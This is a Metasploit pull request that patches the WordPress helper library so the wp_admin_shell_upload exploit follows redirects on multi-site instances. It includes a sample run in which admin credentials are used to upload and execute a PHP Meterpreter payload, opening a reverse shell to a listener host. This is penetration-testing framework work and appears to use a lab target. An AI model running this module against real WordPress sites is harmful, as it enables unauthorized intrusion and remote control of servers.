### PR TITLE
Add support for multi-site WordPress instances to wp_admin_shell_upload

### DIFF
--- a/lib/msf/core/exploit/http/wordpress/helpers.rb
+++ b/lib/msf/core/exploit/http/wordpress/helpers.rb
@@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
   #
   # @param cookie [String] A valid admin session cookie
   # @return [String,nil] The nonce, nil on error
-  def wordpress_helper_get_plugin_upload_nonce(cookie)
-    uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
+  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
+    uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
     options = {
       'method'    => 'GET',
       'uri'       => uri,
@@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
     res = send_request_cgi(options)
     if res && res.code == 200
       return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+    elsif res && res.redirect? && res.redirection
+      path = wordpress_helper_parse_location_header(res)
+      return wordpress_helper_get_plugin_upload_nonce(cookie, path)
     end
   end
 end

--- a/lib/msf/core/exploit/http/wordpress/helpers.rb
+++ b/lib/msf/core/exploit/http/wordpress/helpers.rb
@@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
   # @param pass [String] Password
   # @param redirect URL [String] to redirect after successful login
   # @return [Hash] The post data for vars_post Parameter
-  def wordpress_helper_login_post_data(user, pass, redirect=nil)
+  def wordpress_helper_login_post_data(user, pass, redirect = nil)
     post_data = {
-        'log' => user.to_s,
-        'pwd' => pass.to_s,
-        'redirect_to' => redirect.to_s,
-        'wp-submit' => 'Login'
+      'log' => user.to_s,
+      'pwd' => pass.to_s,
+      'redirect_to' => redirect.to_s,
+      'wp-submit' => 'Login'
     }
     post_data
   end
@@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
   # @return [String,nil] The location of the new comment/post, nil on error
   def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url)
     vars_post = {
-        'comment' => comment,
-        'submit' => 'Post+Comment',
-        'comment_post_ID' => comment_post_id.to_s,
-        'comment_parent' => '0'
+      'comment' => comment,
+      'submit' => 'Post+Comment',
+      'comment_post_ID' => comment_post_id.to_s,
+      'comment_parent' => '0'
     }
     vars_post.merge!({
-        'author' => author,
-        'email' => email,
-        'url' => url,
+      'author' => author,
+      'email' => email,
+      'url' => url
     }) unless login_cookie
 
     options = {
-        'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
-        'method' => 'POST'
+      'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
+      'method' => 'POST'
     }
-    options.merge!({'vars_post' => vars_post})
-    options.merge!({'cookie' => login_cookie}) if login_cookie
+    options.merge!({ 'vars_post' => vars_post })
+    options.merge!({ 'cookie' => login_cookie }) if login_cookie
     res = send_request_cgi(options)
     if res && res.redirect? && res.redirection
       return wordpress_helper_parse_location_header(res)
@@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
   # @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found
   # @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user
   # @return [Integer,nil] The post id, nil when nothing found
-  def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil)
+  def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil)
     range.each { |id|
       vprint_status("Checking POST ID #{id}...") if (id % 100) == 0
       body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
@@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
   # @param comments_enabled [Boolean] Check if comments are enabled on this post
   # @param login_cookie [String] A valid login cookie to perform the check as an authenticated user
   # @return [String,nil] the HTTP response body of the post, nil otherwise
-  def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
+  def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil)
     options = {
-        'method' => 'GET',
-        'uri' => uri
+      'method' => 'GET',
+      'uri' => uri
     }
-    options.merge!({'cookie' => login_cookie}) if login_cookie
+    options.merge!({ 'cookie' => login_cookie }) if login_cookie
     res = send_request_cgi(options)
     # post exists
-    if res and res.code == 200
+    if res && res.code == 200
       # also check if comments are enabled
       if comments_enabled
         if res.body =~ /form.*action.*wp-comments-post\.php/


### PR DESCRIPTION
Add support for multi-site WordPress instances to `exploit/unix/webapp/wp_admin_shell_upload`. This was done by allowing for redirects to be followed in `wordpress_helper_get_plugin_upload_nonce`
Resolves #8680

## Verification

- [x] Setup multi-site WordPress instance as described in #8680
- [x] Start `msfconsole`
- [x] `use exploit/unix/webapp/wp_admin_shell_upload`
- [x] `set USERNAME`, `PASSWORD`, `RHOST`
- [x] `run`
- [x] **Verify** you get a shell

## Example run

```
msf exploit(wp_admin_shell_upload) > options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.0.0.40        yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME   admin            yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.49        yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress


msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.0.0.49:4444 
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/DhdvrmtvYt/TCAQARbaXX.php...
[*] Sending stage (37514 bytes) to 10.0.0.40
[*] Meterpreter session 2 opened (10.0.0.49:4444 -> 10.0.0.40:57316) at 2017-09-02 22:01:07 -0500
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[+] Deleted TCAQARbaXX.php
[+] Deleted DhdvrmtvYt.php

meterpreter > 
```

